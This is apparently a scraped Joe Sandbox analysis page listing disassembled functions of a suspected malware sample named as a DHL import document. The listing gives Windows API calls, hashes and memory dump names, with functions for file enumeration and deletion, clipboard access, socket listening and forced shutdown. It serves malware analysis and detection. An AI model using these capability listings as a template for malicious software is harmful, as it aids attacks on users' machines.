                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                          • String ID:
                                                                                          • API String ID: 420908878-0
                                                                                          • Opcode ID: c307bd9fd2b2a9e14e6335f89a991c583018d0dd86b0e74d8d6cbed36dc3219f
                                                                                          • Instruction ID: b53426ed74e5f0e362524acd96c97f46003d66edc4e43e3e1fb128cf9128fe74
                                                                                          • Opcode Fuzzy Hash: c307bd9fd2b2a9e14e6335f89a991c583018d0dd86b0e74d8d6cbed36dc3219f
                                                                                          • Instruction Fuzzy Hash: 5D61AB34204209AFD300EF24D898F3AB7A4FF84714F15551EF896D72A2CB71E905CBA2
                                                                                          APIs
                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 008469BE
                                                                                          • FindClose.KERNEL32(00000000), ref: 00846A12
                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00846A4E
                                                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00846A75
                                                                                            • Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD
                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00846AB2
                                                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 00846ADF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                          • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                          • API String ID: 3830820486-3289030164
                                                                                          • Opcode ID: 7f1afa8cea24b9b2c8d54c586ab7ee9df8e14a7ed158f60d5b8d9ca6d9b76430
                                                                                          • Instruction ID: d82306a28d6926f72862be9a9677258fa18c941fff84799aa02ae6e91d051ac6
                                                                                          • Opcode Fuzzy Hash: 7f1afa8cea24b9b2c8d54c586ab7ee9df8e14a7ed158f60d5b8d9ca6d9b76430
                                                                                          • Instruction Fuzzy Hash: 0ED150B2508344AEC714EBA4C895EABB7FCFF88704F44491EF585D6291EB78DA04C762
                                                                                          APIs
                                                                                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00849663
                                                                                          • GetFileAttributesW.KERNEL32(?), ref: 008496A1
                                                                                          • SetFileAttributesW.KERNEL32(?,?), ref: 008496BB
                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 008496D3
                                                                                          • FindClose.KERNEL32(00000000), ref: 008496DE
                                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 008496FA
                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 0084974A
                                                                                          • SetCurrentDirectoryW.KERNEL32(00896B7C), ref: 00849768
                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 00849772
                                                                                          • FindClose.KERNEL32(00000000), ref: 0084977F
                                                                                          • FindClose.KERNEL32(00000000), ref: 0084978F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                          • String ID: *.*
                                                                                          • API String ID: 1409584000-438819550
                                                                                          • Opcode ID: 1585ffd394a8cbacaf9cd5d27d00e9914be86182e467451c7f60f5b6052147a8
                                                                                          • Instruction ID: cd4314392261b4cca704d1101cd47691404a92c0ce1c8b3ece1e3622bd890ccd
                                                                                          • Opcode Fuzzy Hash: 1585ffd394a8cbacaf9cd5d27d00e9914be86182e467451c7f60f5b6052147a8
                                                                                          • Instruction Fuzzy Hash: FF31BE3260121DAEDB20AFB4DC08AEF77ACFF09320F154156E995E22A0EB74DE408B14
                                                                                          APIs
                                                                                          • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 008497BE
                                                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 00849819
                                                                                          • FindClose.KERNEL32(00000000), ref: 00849824
                                                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 00849840
                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00849890
                                                                                          • SetCurrentDirectoryW.KERNEL32(00896B7C), ref: 008498AE
                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 008498B8
                                                                                          • FindClose.KERNEL32(00000000), ref: 008498C5
                                                                                          • FindClose.KERNEL32(00000000), ref: 008498D5
                                                                                            • Part of subcall function 0083DAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 0083DB00
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                          • String ID: *.*
                                                                                          • API String ID: 2640511053-438819550
                                                                                          • Opcode ID: 9740847897e90eecb44911e1d68df71fe54ef2dac6ff67280d3d2f86ab9d26d3
                                                                                          • Instruction ID: a310d3de365d9f1ae1954d16c5fcda688ce26a7568089720c76b5ffa093ad1c2
                                                                                          • Opcode Fuzzy Hash: 9740847897e90eecb44911e1d68df71fe54ef2dac6ff67280d3d2f86ab9d26d3
                                                                                          • Instruction Fuzzy Hash: 3D31C13150021D6EDF20EFB8EC48AEF77ACFF46320F144166E990E2290EB75DA448A60
                                                                                          APIs
                                                                                          • GetLocalTime.KERNEL32(?), ref: 00848257
                                                                                          • SystemTimeToFileTime.KERNEL32(?,?), ref: 00848267
                                                                                          • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00848273
                                                                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00848310
                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00848324
                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00848356
                                                                                          • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0084838C
                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00848395
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentDirectoryTime$File$Local$System
                                                                                          • String ID: *.*
                                                                                          • API String ID: 1464919966-438819550
                                                                                          • Opcode ID: f4795a6cc640796550fa7bdd809157248e14e347dd8a1560610a104bad1f93f5
                                                                                          • Instruction ID: 768f29045e7cae4513883624ed1f0b8053c9229c344efc334857b0b88fa17ab2
                                                                                          • Opcode Fuzzy Hash: f4795a6cc640796550fa7bdd809157248e14e347dd8a1560610a104bad1f93f5
                                                                                          • Instruction Fuzzy Hash: 2B6135B2504209DFCB10EF64D8449AEB3E8FF89314F04891AF99AD7351EB35E945CB92
                                                                                          APIs
                                                                                            • Part of subcall function 007D3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007D3A97,?,?,007D2E7F,?,?,?,00000000), ref: 007D3AC2
                                                                                            • Part of subcall function 0083E199: GetFileAttributesW.KERNEL32(?,0083CF95), ref: 0083E19A
                                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0083D122
                                                                                          • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 0083D1DD
                                                                                          • MoveFileW.KERNEL32(?,?), ref: 0083D1F0
                                                                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 0083D20D
                                                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 0083D237
                                                                                            • Part of subcall function 0083D29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,0083D21C,?,?), ref: 0083D2B2
                                                                                          • FindClose.KERNEL32(00000000,?,?,?), ref: 0083D253
                                                                                          • FindClose.KERNEL32(00000000), ref: 0083D264
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                          • String ID: \*.*
                                                                                          • API String ID: 1946585618-1173974218
                                                                                          • Opcode ID: ac4c41a92573f47ea04c149b2e34c583c5c6631c8d01ea4c28e16c04856d0728
                                                                                          • Instruction ID: c1aa8041f561ecfd89cf4e23ec0cd236cfe36389a55c57c87894a328c1898d27
                                                                                          • Opcode Fuzzy Hash: ac4c41a92573f47ea04c149b2e34c583c5c6631c8d01ea4c28e16c04856d0728
                                                                                          • Instruction Fuzzy Hash: F0613C3190120DABCF05EBA0EA969EEB775FF95300F244166E401B7291EB356F09DBA1
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                          • String ID:
                                                                                          • API String ID: 1737998785-0
                                                                                          • Opcode ID: b1859845253a1a108ebd68c025babf1de7a9f7c5bc4666bbe9aa37f6eb97e186
                                                                                          • Instruction ID: 9cec8e701ecd85be1d62378af440ab80dd1f89095cecefd56f97fd6d78eafea3
                                                                                          • Opcode Fuzzy Hash: b1859845253a1a108ebd68c025babf1de7a9f7c5bc4666bbe9aa37f6eb97e186
                                                                                          • Instruction Fuzzy Hash: 8B418B35604615AFE720DF19E888B29BBA1FF44318F158099E85ACB762C775EC41CB90
                                                                                          APIs
                                                                                            • Part of subcall function 008316C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0083170D
                                                                                            • Part of subcall function 008316C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0083173A
                                                                                            • Part of subcall function 008316C3: GetLastError.KERNEL32 ref: 0083174A
                                                                                          • ExitWindowsEx.USER32(?,00000000), ref: 0083E932
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
                                                                                          Similarity
                                                                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                          • String ID: $ $@$SeShutdownPrivilege
                                                                                          • API String ID: 2234035333-3163812486
                                                                                          • Opcode ID: c2fb82bcb7f78a0f0604ccffc0d76f53e278442c85680e8aa7fbbd5ababec847
                                                                                          • Instruction ID: 379666924c19bfdf065b0fd50170b64fff082f54eba15025f36d60c6faa0577e
                                                                                          • Opcode Fuzzy Hash: c2fb82bcb7f78a0f0604ccffc0d76f53e278442c85680e8aa7fbbd5ababec847
                                                                                          • Instruction Fuzzy Hash: 5401F972710215ABEF5426B89C8AFBF765CF794754F154422FC13F21D1E6A45C4083D1
APIs
• socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00851276
• WSAGetLastError.WSOCK32 ref: 00851283
• bind.WSOCK32(00000000,?,00000010), ref: 008512BA
• WSAGetLastError.WSOCK32 ref: 008512C5
• closesocket.WSOCK32(00000000), ref: 008512F4
• listen.WSOCK32(00000000,00000005), ref: 00851303
• WSAGetLastError.WSOCK32 ref: 0085130D
• closesocket.WSOCK32(00000000), ref: 0085133C
Memory Dump Source
• Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
Similarity
• API ID: ErrorLast$closesocket$bindlistensocket
• String ID:
• API String ID: 540024437-0
• Opcode ID: e9a19b9f7a1b17e5fd6ea8f9cdaf18b7ad64f20ac364a5e7163247104a601886
• Instruction ID: f2bb445bf73d04a56512cdb37e5d3832b0d3f402ff33684807dbceb7e7b58ccd
• Instruction Fuzzy Hash: 9C418D316001019FDB20DF24C489B69BBE6FF86319F198199E8568F392C775EC85CBE1
APIs
  • Part of subcall function 007D3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,007D3A97,?,?,007D2E7F,?,?,?,00000000), ref: 007D3AC2
  • Part of subcall function 0083E199: GetFileAttributesW.KERNEL32(?,0083CF95), ref: 0083E19A
• FindFirstFileW.KERNEL32(?,?), ref: 0083D420
• DeleteFileW.KERNEL32(?,?,?,?), ref: 0083D470
• FindNextFileW.KERNEL32(00000000,00000010), ref: 0083D481
• FindClose.KERNEL32(00000000), ref: 0083D498
• FindClose.KERNEL32(00000000), ref: 0083D4A1
Memory Dump Source
• Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
Similarity
• API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
• String ID: \*.*
• API String ID: 2649000838-1173974218
• Opcode ID: f0d75c7a0d9d366808af555a547ff5abc0608a1f695a27c51681fd1be56c5e90
• Instruction ID: 2c1898a76e689f0ede28de73162994bc09726b02229fd7f67f54c7b54194fec8
• Instruction Fuzzy Hash: D5318E71008345ABC301EF64D8958AFB7B8FE91304F444A1EF4D593291EB34AA09DBA7
Memory Dump Source
• Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
Similarity
• API ID: __floor_pentium4
• String ID: 1#IND$1#INF$1#QNAN$1#SNAN
• API String ID: 4168288129-2761157908
• Opcode ID: f52f54a45211ac9568d5c0dfb6551fc86ed4acb10edec0f54c36a980855c6121
• Instruction ID: 9b213d571092315c985b67b4514bb231d5416c0184b4b9e06468a739a92d2956
• Instruction Fuzzy Hash: 33C22A72E046288FDBB5CE289D447EAB7B5FB44304F1445EAD54DE7281E778AE818F40
APIs
• _wcslen.LIBCMT ref: 008464DC
• CoInitialize.OLE32(00000000), ref: 00846639
• CoCreateInstance.OLE32(0086FCF8,00000000,00000001,0086FB68,?), ref: 00846650
• CoUninitialize.OLE32 ref: 008468D4
Memory Dump Source
• Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
Similarity
• API ID: CreateInitializeInstanceUninitialize_wcslen
• String ID: .lnk
• API String ID: 886957087-24824748
• Opcode ID: 477df773b850872df13dc81431ec82be00987005eb7e7c1f1fb470501f87f876
• Instruction ID: 80a2e88f23bebe74134af34423df60cd23762be87f7a38fca4fda88372808b19
• Instruction Fuzzy Hash: 98D13871508205AFC314EF24C885A6BB7E8FF95704F04496DF595CB2A1EB74ED05CBA2
APIs
• GetForegroundWindow.USER32(?,?,00000000), ref: 008522E8
  • Part of subcall function 0084E4EC: GetWindowRect.USER32(?,?), ref: 0084E504
• GetDesktopWindow.USER32 ref: 00852312
• GetWindowRect.USER32(00000000), ref: 00852319
• mouse_event.USER32(00008001,?,?,00000002,00000002), ref: 00852355
• GetCursorPos.USER32(?), ref: 00852381
• mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 008523DF
Memory Dump Source
• Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
Similarity
• API ID: Window$Rectmouse_event$CursorDesktopForeground
• String ID:
• API String ID: 2387181109-0
• Opcode ID: 95bdf727524ab46f423e988a2befa1f318d9346ab54aa8f09dc40c0b88e7e63d
• Instruction ID: 3eba9c1bbbaa65fdafecf6e8fe9526d5dc02de25ba656a1ae219989dfab41ef4
• Instruction Fuzzy Hash: AB31BE72504315AFDB20DF58C849BABBBA9FF85314F00091DF985D7291DB74EA09CB92
APIs
  • Part of subcall function 007D9CB3: _wcslen.LIBCMT ref: 007D9CBD
• FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00849B78
• FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00849C8B
  • Part of subcall function 00843874: GetInputState.USER32 ref: 008438CB
  • Part of subcall function 00843874: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00843966
• Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00849BA8
• FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00849C75
Memory Dump Source
• Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
Similarity
• API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
• String ID: *.*
• API String ID: 1972594611-438819550
• Opcode ID: 08cea8bb3cf47c445920c658e7fbfbaa5b72eeb4206d88981133f669241e026e
• Instruction ID: 87a596699e9272591298dbbffd114675e2a6dc86fa03bf78a95a4d4678695dc9
• Instruction Fuzzy Hash: CF415E7194420EAFCF24DF64C989AEEBBB8FF05310F244156E955E2291EB349E44CF61
APIs
  • Part of subcall function 007E9BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 007E9BB2
• DefDlgProcW.USER32(?,?,?,?,?), ref: 007E9A4E
• GetSysColor.USER32(0000000F), ref: 007E9B23
• SetBkColor.GDI32(?,00000000), ref: 007E9B36
Memory Dump Source
• Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
Similarity
• API ID: Color$LongProcWindow
• String ID:
• API String ID: 3131106179-0
• Opcode ID: 2ec4b7e7950e70f2898d3ec89f3a627a778a8b53094a4a907abcb56ce2d1b7cc
• Instruction ID: db82daf8bec88c327c88fe52283e11647e797cab7a1ee377bb5474b877ce712d
• Instruction Fuzzy Hash: FCA13C7210A5A4BEE7249A3F9C5CD7B365DFF4A304F158129F702C6AD1CA2D9D41C272
APIs
  • Part of subcall function 0085304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0085307A
  • Part of subcall function 0085304E: _wcslen.LIBCMT ref: 0085309B
• socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0085185D
• WSAGetLastError.WSOCK32 ref: 00851884
• bind.WSOCK32(00000000,?,00000010), ref: 008518DB
• WSAGetLastError.WSOCK32 ref: 008518E6
• closesocket.WSOCK32(00000000), ref: 00851915
Memory Dump Source
• Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.000000000086C000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849439709.0000000000892000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849538820.000000000089C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1849557372.00000000008A4000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7d0000_DHL_IMPORT_8236820594.jbxd
Similarity
• API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
• String ID:
• API String ID: 1601658205-0
• Opcode ID: 2d1f4ec01169df6f5e532ec3b9ac5b38a9b493c49563cab27d6dfc3ba7ad7341
• Instruction ID: 4e8ac390515b94d189bfcf9b6da71fef3e33e1cdd7920de9c68ff8bd4db148fe
• Instruction Fuzzy Hash: 3151C575A00200AFDB20AF24C88AF6A77E5EB49718F488059F9469F3C3D775AD41CBE1
Memory Dump Source
• Source File: 00000000.00000002.1849391751.00000000007D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
• Associated: 00000000.00000002.1849379798.00000000007D0000.00000002.00000001.01000000.00000003.sdmp
